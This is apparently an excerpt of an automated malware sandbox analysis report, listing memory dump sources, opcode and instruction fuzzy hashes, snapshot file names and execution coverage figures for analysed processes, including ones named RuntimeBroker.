                                            • Opcode Fuzzy Hash: 96d2cab12d1ffe578018975ca043720028c21b2bddb4f5caf237e70d3f0caeda
                                            • Instruction Fuzzy Hash: 8D313431B1D6AE8FD712BBB8CC216E9B7B0EF46310F054177C025CB1D2DA3866068B92
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8F6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8f6000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cfc00aab3a5630391d03c7dd34ed01a38c44f6fca3edadaa133df4387b57b112
                                            • Instruction ID: cb2a0fa72c7d63738dca0d8ababe1b704bc94abd7227094f3a636fe006aaed52
                                            • Opcode Fuzzy Hash: cfc00aab3a5630391d03c7dd34ed01a38c44f6fca3edadaa133df4387b57b112
                                            • Instruction Fuzzy Hash: 9F313870B0A64D8FDB68DF98C8656ED7BE1EF58301F11027AD00AE3291DA786D45CB85
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8ca000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 37a0ba8039a4c45a60fe33e7b579e3fd9b992b80ac520833a191c01f9d9119db
                                            • Instruction ID: 3d5b0aeca8cd1947238851883fdeb59c2aae6411c29f00f3eab8cec266e6d38e
                                            • Opcode Fuzzy Hash: 37a0ba8039a4c45a60fe33e7b579e3fd9b992b80ac520833a191c01f9d9119db
                                            • Instruction Fuzzy Hash: 4B311471A0991D8FDB98EB18C895AB9B7F1FF58300F5482EA804DD3165DE35AA81CF80
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8b0000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0ede6b29adc93ccaacb9f7ad5cc0b25f6ffc85fe6403b897dd40815e7c9d920d
                                            • Instruction ID: af6d95a30620603c4c44c7169a0573ebe2fd89c57332c718be7ba19b5c3dfcdd
                                            • Opcode Fuzzy Hash: 0ede6b29adc93ccaacb9f7ad5cc0b25f6ffc85fe6403b897dd40815e7c9d920d
                                            • Instruction Fuzzy Hash: 6E318D35A1891D8FDF94EF14C865AEDB7B1FB64309F1001EA900EE3265DB719A818F81
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8F6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8f6000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1438ec786a40a7f74082025b09f02a18deae26e0de2cf51d7f813c86e296922d
                                            • Instruction ID: 4499a482f929d01b81ddf8c5c0312aecdbfc404559eaa8ccf53d34f03c9803d1
                                            • Opcode Fuzzy Hash: 1438ec786a40a7f74082025b09f02a18deae26e0de2cf51d7f813c86e296922d
                                            • Instruction Fuzzy Hash: D4218331A0968D8FDB65DF68C8656ED7FB0FF59300F0501FAD40CC61A2DA349A54C781
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8C6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8c6000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a82ec5747f0259b4f052654b380cb09f09b15fe057bc11e2dda7c51d39c0105a
                                            • Instruction ID: 4fb8a698d26a0fadb8ab20ceef1ec9df118ae06e9a1a6b3485b1a97d27e18d95
                                            • Opcode Fuzzy Hash: a82ec5747f0259b4f052654b380cb09f09b15fe057bc11e2dda7c51d39c0105a
                                            • Instruction Fuzzy Hash: 8A21AE31A1965D8FDB18EF58C8656FD77F1FF58310F11026BD40AE3291DA34AA158B82
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8F6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8f6000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c7ab8c897f27f00781017231bb00ce745c436b42226d1030689b2017a64eb2f2
                                            • Instruction ID: 6febc40c30f12ea9bb97a0d637351723c922ce5f2ef1332b5b722c240dc2966c
                                            • Opcode Fuzzy Hash: c7ab8c897f27f00781017231bb00ce745c436b42226d1030689b2017a64eb2f2
                                            • Instruction Fuzzy Hash: B8210C34E0965D8BEB68DF84C8647BCB7B1FB58301F1105BDC009A72A1DB782A81CB40
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8F6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8f6000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d4bc9b5e06d5f948fdcd63b0c8b51f1c7945704d7d99561e97895108bfc1c765
                                            • Instruction ID: 3c020dbfd3551da5abe27f5a5f242bf058b1b69132ee38a2b96cf3ab8430a1e1
                                            • Opcode Fuzzy Hash: d4bc9b5e06d5f948fdcd63b0c8b51f1c7945704d7d99561e97895108bfc1c765
                                            • Instruction Fuzzy Hash: 73118F32A0F68D4FDB56CF649C655B87FB0FF66300B0502FBD058C71A6C665AA44C781
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8bc000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a94c6760eef1f0ae35577e15f564415eda7bb7f0bf00e1dc023aa5506d116b14
                                            • Instruction ID: 20f68c975ef253f35485cdc16c80b8e34459a776b96b22c75c16f1692f995448
                                            • Opcode Fuzzy Hash: a94c6760eef1f0ae35577e15f564415eda7bb7f0bf00e1dc023aa5506d116b14
                                            • Instruction Fuzzy Hash: 4611CC74A1951D8FDFA9EB48C854AA8B3B5FF59301F1001E9D00DE7251CB71AE80CF40
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8bc000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d92f7e8ecb349551ad8d329a2dc1ad7fb93937251b6f7dd3da1d97bd7bdff685
                                            • Instruction ID: 0a3276b65399b9474d190bbf9520e53e74adba15f4cfaf0d70660d07c0c982ee
                                            • Opcode Fuzzy Hash: d92f7e8ecb349551ad8d329a2dc1ad7fb93937251b6f7dd3da1d97bd7bdff685
                                            • Instruction Fuzzy Hash: 0421B874A1951D8FCBA9EB48C855AA8B3B5FF59701F5001EAD10EE7261CB71AE80CF40
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8F6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8f6000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 356b799c3ef900fec06fca16495b2863fdd61f3a48a8af6bfd1c2f190ec20d7d
                                            • Instruction ID: d021057e425c22c687860f08f89fa1f067e29cb4d415969e135d89cff7704050
                                            • Opcode Fuzzy Hash: 356b799c3ef900fec06fca16495b2863fdd61f3a48a8af6bfd1c2f190ec20d7d
                                            • Instruction Fuzzy Hash: 6A11BC36B0854E8FEB51EF58C855AFE3BA0FF58314B0404B6D40DC71A2DA30AA55CB81
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8ca000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1ebcd0409f6e5d0ee7708e49e73ad5971e7e5012f4d1be94fb742396852e3218
                                            • Instruction ID: efb22442dcb51d31079d68c88dad3e5e0c5093a0ad17e526a95b5216a282f99f
                                            • Opcode Fuzzy Hash: 1ebcd0409f6e5d0ee7708e49e73ad5971e7e5012f4d1be94fb742396852e3218
                                            • Instruction Fuzzy Hash: 5921EE70B0965D8FEBA4EF58C8947A8B3B1FF59301F1446EA800DE22A1DA345AC4CF01
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8bc000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1b18aef0571ccd1299b2df6d97ebd3cd3b6577e102b04dc5705b7665b4834b98
                                            • Instruction ID: 93f121af7a307f97be566d2bfb52fa4ddc0e3b4346ea1a9293cc7a8ed1ae4614
                                            • Opcode Fuzzy Hash: 1b18aef0571ccd1299b2df6d97ebd3cd3b6577e102b04dc5705b7665b4834b98
                                            • Instruction Fuzzy Hash: 7101A171D5E3C98FD752ABB448641E47FF0EF1B201F0A41EBD489CA0B3D9691A49C751
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8F6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8f6000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 895ac4353df9bc6544968c1f366b83547634c1721456d9b0c645ff6f66d3a6f3
                                            • Instruction ID: 2f81750fc5a2e1cfa2705e0642c6f3c85a833bb616d9a9c60ba140c499f6c0d2
                                            • Opcode Fuzzy Hash: 895ac4353df9bc6544968c1f366b83547634c1721456d9b0c645ff6f66d3a6f3
                                            • Instruction Fuzzy Hash: 7A01A576E0954D8FDF94DFA8D4A15FC7BA1EF64210B14016AE01DC31A1DE31AA01C780
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8F6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8f6000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 43ae9f2043c67dfcf80a1d1e4f995c1f33a209b1692a6a226c29c6888595434d
                                            • Instruction ID: 17cd652b694b1fd4550fdaa19f74a5cc843b56ff702ae9acbb39f9ad5efd3d84
                                            • Opcode Fuzzy Hash: 43ae9f2043c67dfcf80a1d1e4f995c1f33a209b1692a6a226c29c6888595434d
                                            • Instruction Fuzzy Hash: D8211A34E0960DDFEB18DF89D494AADB7F2FF98315F148135D009972A9DB38A982CB41
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8F6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8f6000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e1788b941a28cbb9923ea619225115ae75348433be91954b0cc313bf490b2df3
                                            • Instruction ID: be2e435f2051be8faf7e1820b116568b4946e85b8e2017fb67cb78cc48ab1357
                                            • Opcode Fuzzy Hash: e1788b941a28cbb9923ea619225115ae75348433be91954b0cc313bf490b2df3
                                            • Instruction Fuzzy Hash: 9311E87090968D8FCF85EF68C859AA97FF0FF29301F0505AAE458D7261D7349554CB81
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8F6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8f6000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 023903b1f462cfbeb51a3a6ee626b4fba672d7d187dbcb77be8c80b05f7bc61f
                                            • Instruction ID: 523ed90be32631dae14803d6cbee7e5b3dd835b3cf1766723234638e805532a6
                                            • Opcode Fuzzy Hash: 023903b1f462cfbeb51a3a6ee626b4fba672d7d187dbcb77be8c80b05f7bc61f
                                            • Instruction Fuzzy Hash: 4F111530908A8D8FCF85EF68C858AA97FF0FF29300F0501AAE408D72A2DB749544CB81
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8F6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8f6000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b4da3135da85069525eeff42be2c99861675da2772d289ca15fa467c6e8ad86c
                                            • Instruction ID: ea2f013828ac08952f415ab04904152715484020991256bff227b88316ebc661
                                            • Opcode Fuzzy Hash: b4da3135da85069525eeff42be2c99861675da2772d289ca15fa467c6e8ad86c
                                            • Instruction Fuzzy Hash: AF110C3090868D8FDF45EF68C899AEA7FF0FF29304F1505AAE419D7161DB349954CB81
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8F6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8f6000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a00930df2fa651dd083a811d370d8b42ea5373f7c256867350f53b5aea9d97bc
                                            • Instruction ID: a66ed920b79e2f63ad1f569f405f15cb48daff1c52553bfdeb51bbf037c35ddb
                                            • Opcode Fuzzy Hash: a00930df2fa651dd083a811d370d8b42ea5373f7c256867350f53b5aea9d97bc
                                            • Instruction Fuzzy Hash: 2F113A74E2DA4D9EEBA4DB998851BA8B7F1EF5D300F1081B5C04DA21A1DA386A808F41
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8F6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8f6000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a81c9fd34f087f349ee18c1a275183d2f5e256ba6c8c4e8bcfa417d418134313
                                            • Instruction ID: c7dfd61391eab43f39ca11a02c470138937d56c19a08fa7a0c923e9af5fff7f4
                                            • Opcode Fuzzy Hash: a81c9fd34f087f349ee18c1a275183d2f5e256ba6c8c4e8bcfa417d418134313
                                            • Instruction Fuzzy Hash: E5014C31909A8C8FCB85EF28C869AD97FF0FF69304F0501AAD409C71A2D735A954CB81
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8ca000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3f1a152a475c5f185389591bd3789c42063096d0aacd9d863d9ca7ee3ac16c3b
                                            • Instruction ID: ed83b85fbe5651fb7fe447b33d055c9e3f5b35d4dd6bac5d130c86662ea8c344
                                            • Opcode Fuzzy Hash: 3f1a152a475c5f185389591bd3789c42063096d0aacd9d863d9ca7ee3ac16c3b
                                            • Instruction Fuzzy Hash: FD111F70A1991D8FDB64EB44C4A4BFCB7B1FB58311F5141BAD00DD36A1CA343A81CB40
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8F6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8f6000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 01f8a854155c18305390354bb870566a879b6e5a7af3eff505e1eb1f32cb5eec
                                            • Instruction ID: d287edc5831284c5a37170ad47247f503eafff0054584ca65be91a833f4292e3
                                            • Opcode Fuzzy Hash: 01f8a854155c18305390354bb870566a879b6e5a7af3eff505e1eb1f32cb5eec
                                            • Instruction Fuzzy Hash: 8D019670914A4D9FDF84EF68C849AEA7BF0FB68305F00456AA819D3264DB30A594CB81
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8F6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8f6000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 235930c003bc9c7171615027db7eee6b487a465107393f834ebb6c280e2db333
                                            • Instruction ID: a1fe8dbc079930b06edb2117a1b8ffa46e3f1571a1ec296e9d641e6f6c1cd2ec
                                            • Opcode Fuzzy Hash: 235930c003bc9c7171615027db7eee6b487a465107393f834ebb6c280e2db333
                                            • Instruction Fuzzy Hash: 4A01A870914A4D9FDF84EF68C849AEE7BF0FB68305F10456AA81DD3264DB70E694CB81
                                            Memory Dump Source
                                            • Source File: 00000029.00000002.2491398126.00007FFD9B8CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_41_2_7ffd9b8ca000_MaEiPrsQRasQLtRzJjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ae90944fd13ea85642e13bd3732c68940585700ad5fac05cae1323f79220b052
                                            • Instruction ID: 96fac698b648e70babe061b79fab4be39a8304cc95122cc0eeb20ab46fe5b993
                                            • Opcode Fuzzy Hash: ae90944fd13ea85642e13bd3732c68940585700ad5fac05cae1323f79220b052
                                            • Instruction Fuzzy Hash: C801DA70914A4D8FDF84EF58C849AEE77F0FB68305F01456AA81DD3260DB74A594CB81
                                            Memory Dump Source
                                            Memory Dump Source
                                            • Source File: 0000002D.00000002.2487962968.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_45_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                            • Opcode Fuzzy Hash: 2b67229bf13f57920e826cc1cb07dade7f839ddababcf82b2c04e60971179061
                                            • Instruction Fuzzy Hash: E8312531B1D69E8BD711BBB8CC216E9B7B0EF56310F054177D025C71D2DA3866068B92
                                            Memory Dump Source
                                            • Source File: 0000002D.00000002.2487962968.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_45_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7c2992d99fc96a6350cb72ccc14103604baaebd9cddfc94dbb1be1a240dd75aa
                                            • Instruction ID: 3126136b5c4134977df317eaf176448b41176d476c85e1ef7beff587cef214e3
                                            • Opcode Fuzzy Hash: 7c2992d99fc96a6350cb72ccc14103604baaebd9cddfc94dbb1be1a240dd75aa
                                            • Instruction Fuzzy Hash: 96318E35A1851D8FDF94EF14C865AEDB7B1FB64305F1001EA900EE32A5DB715A818F81
                                            Memory Dump Source
                                            • Source File: 0000002D.00000002.2487962968.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_45_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1b6e04b4c819a432461ef48a988ee830a16297083f4153e054eea93f5a9e29b0
                                            • Instruction ID: d7bb788f6fb727c6fc3ba4e69692875e9b8b759da93a299f8289204ec5c4837a
                                            • Opcode Fuzzy Hash: 1b6e04b4c819a432461ef48a988ee830a16297083f4153e054eea93f5a9e29b0
                                            • Instruction Fuzzy Hash: C1110832B1D69E8FD702B7B8CC215E97770EB43311F0945B3D051CB1D2DA34621A8B92
                                            Memory Dump Source
                                            • Source File: 0000002D.00000002.2487962968.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_45_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8f3026cfc4ec5876e3f77ff4a50ad8f92277a26910de4d2c5e3f1dfeda3ffaec
                                            • Instruction ID: 9e054c1d6dbb54576dee64b1da8cd8774a023870a1b2e526c0cc58ba5587eee4
                                            • Opcode Fuzzy Hash: 8f3026cfc4ec5876e3f77ff4a50ad8f92277a26910de4d2c5e3f1dfeda3ffaec
                                            • Instruction Fuzzy Hash: 26115E70E2950E9AEB61FFE898596FDB7E0FF18704F110477E41CC21A4DE3862948A81
                                            Memory Dump Source
                                            • Source File: 0000002D.00000002.2487962968.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_45_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bea534291ddd2d63c44c9c404e67e8befc46149196122322c37fe6c4680e1304
                                            • Instruction ID: c01f8ecead992f414a46f8cfff08de5c060ab7545d19324280a68e6eba8aa821
                                            • Opcode Fuzzy Hash: bea534291ddd2d63c44c9c404e67e8befc46149196122322c37fe6c4680e1304
                                            • Instruction Fuzzy Hash: 9811E531A1E69E8FD712ABB4CC205EA7B70EB47310F0946B3D011CB1E2DA386619CB91
                                            Memory Dump Source
                                            • Source File: 0000002D.00000002.2487962968.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_45_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6ab3c8905662aa6d33b5467a7573835f556b018ca7f1fe4d00f8c094acf67d64
                                            • Instruction ID: b075836b43be507d191724f73762c85edb46660662d651176e26ced598a949aa
                                            • Opcode Fuzzy Hash: 6ab3c8905662aa6d33b5467a7573835f556b018ca7f1fe4d00f8c094acf67d64
                                            • Instruction Fuzzy Hash: 8401D631E1E69A8FD712A7B4CC245EA7B70EF07310F0946A3D011CB1E6DE386615CB91
                                            Memory Dump Source
                                            • Source File: 0000002D.00000002.2487962968.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_45_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8aba62ac96dfd5c256fd12236cc73c3cfdbf0c200219407f1ef0ea0d01e435e6
                                            • Instruction ID: bc4597ad5e9d69bdc1633f4aee62fb7cb72d8758a3867bacdbe04bc80a32ad76
                                            • Opcode Fuzzy Hash: 8aba62ac96dfd5c256fd12236cc73c3cfdbf0c200219407f1ef0ea0d01e435e6
                                            • Instruction Fuzzy Hash: 44F01C7091590E9FDB90FFA8C8596FE7BE0FF58305F11057AE81CC21A4DA34A6A4CB81
                                            Memory Dump Source
                                            • Source File: 0000002D.00000002.2487962968.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_45_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 482f46616c8a6a6aa14d72a80944ba7020efb826d907762607f1f3013e7c7d8d
                                            • Instruction ID: 576209a028c0e91b6daa014da4b0f7417e4a81583b20f13fd7d84aadf086d334
                                            • Opcode Fuzzy Hash: 482f46616c8a6a6aa14d72a80944ba7020efb826d907762607f1f3013e7c7d8d
                                            • Instruction Fuzzy Hash: 1CF01C74A2950DDBDB64FBA8E911AEA77A0EF04344F000076E41DC3195DA34A665DB91

                                            Execution Graph

                                            Execution Coverage:4.9%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:6
                                            Total number of Limit Nodes:0
                                            execution_graph 18534 7ffd9b8a26fe 18535 7ffd9b8a270d VirtualProtect 18534->18535 18537 7ffd9b8a284d 18535->18537 18530 7ffd9b8a40ed 18531 7ffd9b8a410f VirtualAlloc 18530->18531 18533 7ffd9b8a4225 18531->18533
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B89C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B89C000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b89c000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ((N$+g=
                                            • API String ID: 0-3603062946
                                            • Opcode ID: 2815d39815dcf6dd011081b066313c267c4ba24e433ba0003c1beff8ca1954f3
                                            • Instruction ID: 901fbfb39202165842719c885eddc5d9967431254bd195a79c8a07b1a302b86a
                                            • Opcode Fuzzy Hash: 2815d39815dcf6dd011081b066313c267c4ba24e433ba0003c1beff8ca1954f3
                                            • Instruction Fuzzy Hash: 6EC2C470E19A1D8FDBA8DB58C895BACB7B1FF59300F1041E9D01DE72A5DA34AA81CF50

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8aa000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9d6a3baa8d0c48621f0346578e424086819423fee60da16d3690f0e8b4a96139
                                            • Instruction ID: 6a76cde2bc6814c2e36900df3f2006d5b49c33f4217833fc2116d943e4a20e97
                                            • Opcode Fuzzy Hash: 9d6a3baa8d0c48621f0346578e424086819423fee60da16d3690f0e8b4a96139
                                            • Instruction Fuzzy Hash: 5AF2FE70E19A5D8FDBA8EB58C865BA8B7F1FB58300F5041FAD00DD32A1DA346A85CF51

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
